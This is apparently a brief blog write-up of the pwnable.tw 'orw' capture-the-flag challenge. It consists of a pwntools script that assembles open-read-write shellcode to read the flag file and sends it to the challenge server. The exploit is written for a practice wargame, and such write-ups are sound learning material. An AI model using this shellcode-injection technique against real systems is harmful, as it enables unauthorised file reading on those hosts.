pwnable.tw - orw
2021. 8. 31. 17:44ㆍPwnable
All this takes is writing shellcode.
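```python
from pwn import *

# Set the target architecture before assembling any shellcode
context(arch='i386', os='linux')
context.log_level = "debug"

r = remote("chall.pwnable.tw", 10001)
e = ELF("orw")

# open -> read -> write; asm() returns bytes, so the payload must start as b""
pay = b""
pay += asm(shellcraft.open('/home/orw/flag'))
# open() leaves the file descriptor in eax; read into a scratch area in .bss
pay += asm(shellcraft.read('eax', e.bss()+0x100, 100))
# write the buffer to stdout (fd 1)
pay += asm(shellcraft.write(1, e.bss()+0x100, 100))

r.recv()
r.sendline(pay)
r.interactive()
```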